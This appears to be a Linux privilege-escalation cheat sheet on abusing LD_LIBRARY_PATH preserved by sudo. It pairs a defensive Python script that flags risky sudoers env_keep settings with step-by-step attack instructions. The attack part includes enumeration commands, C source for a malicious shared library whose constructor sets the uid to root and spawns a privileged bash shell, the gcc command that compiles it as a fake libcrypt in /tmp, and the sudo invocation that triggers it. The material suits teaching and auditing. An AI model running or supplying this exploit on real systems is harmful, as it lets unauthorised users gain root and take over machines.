LD_LIBRARY_PATH
Programs running via sudo can inherit variables from the environment of the user. If the env_reset option is set in the /etc/sudoers config file, sudo will run the programs in a new, minimal environment. The env_keep option can be used to keep certain environment variables from the user’s environment. The configured options are displayed when running sudo -l.
LD_LIBRARY_PATH is inherited from the user's environment. It contains a list of directories that are searched for shared libraries first.
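A check for the sudoers condition described above, as an added example that is not part of the original page: it parses sudoers text and reports `Defaults` entries that disable env_reset or whose env_keep preserves dynamic-loader variables. The function name `audit_sudoers`, the sample sudoers content, and the inclusion of LD_PRELOAD and LD_AUDIT alongside LD_LIBRARY_PATH are assumptions of this example.

```python
import re
from fnmatch import fnmatchcase

# Loader variables to flag. LD_LIBRARY_PATH is the one this page covers;
# LD_PRELOAD and LD_AUDIT are added here as an assumption of the example.
LOADER_VARS = ("LD_LIBRARY_PATH", "LD_PRELOAD", "LD_AUDIT")
PARAM = re.compile(r'(!?)([a-z_]+)\s*(?:([+-]?=)\s*("[^"]*"|[^\s,]+))?')

def audit_sudoers(text):
    """Return (scope, finding) pairs for Defaults lines that weaken env handling."""
    kept, findings = {}, []              # kept: scope -> env_keep patterns
    text = re.sub(r'\\\n', ' ', text)    # join backslash-continued lines
    for line in text.splitlines():
        m = re.match(r'Defaults(\S*)\s+(.*)', line.split('#', 1)[0].strip())
        if not m:
            continue                     # comments, user specs, aliases
        scope = m.group(1) or "(global)"
        for neg, name, op, val in PARAM.findall(m.group(2)):
            if name == "env_reset" and neg:
                findings.append((scope, "env_reset disabled"))
            elif name == "env_keep":
                pats = val.strip('"').split()
                cur = kept.setdefault(scope, [])
                if neg or op == "=":
                    cur.clear()          # "!env_keep" or "=" discards earlier entries
                if op in ("=", "+="):
                    cur.extend(pats)
                elif op == "-=":
                    cur[:] = [p for p in cur if p not in pats]
    for scope, pats in kept.items():
        # sudoers patterns may contain '*'; fnmatch is a slightly broader match
        hits = sorted(v for v in LOADER_VARS if any(fnmatchcase(v, p) for p in pats))
        if hits:
            findings.append((scope, "env_keep preserves " + ", ".join(hits)))
    return findings

# Constructed sample sudoers content (not taken from a real host).
SAMPLE = r'''
Defaults env_reset
Defaults env_keep += "LANG LD_LIBRARY_PATH"
Defaults:alice env_keep += "LD_*", !env_reset
Defaults:bob env_keep += LD_PRELOAD
Defaults:bob env_keep -= LD_PRELOAD
Defaults:carol env_keep += \
    "LD_AUDIT"
Defaults secure_path="/usr/sbin:/usr/bin"
'''

if __name__ == "__main__":
    for scope, finding in audit_sudoers(SAMPLE):
        print(f"{scope}: {finding}")
```

The scanner only sees the text it is given, so files pulled in through include directives have to be passed to it as well.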
Steps
Investigate the sudo-able programs and the libraries used.
# Check if you see any sudo configuration for your username
sudo -l

# Check which shared libraries the programs use. In this case, apache2
ldd /usr/sbin/iftop
...
ldd /usr/sbin/apache2

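Compile the following code as a shared library.
#define _GNU_SOURCE   /* needed for setresuid() */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* The constructor attribute runs hijack() when the library is loaded */
static void hijack() __attribute__((constructor));

void hijack() {
    /* Remove the variable so child processes resolve libraries normally */
    unsetenv("LD_LIBRARY_PATH");
    setresuid(0,0,0);
    system("/bin/bash -p");
}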
gcc -o /tmp/libcrypt.so.1 -shared -fPIC /home/user/tools/sudo/library_path.c
Run the program with sudo to escalate privileges.

sudo LD_LIBRARY_PATH=/tmp apache2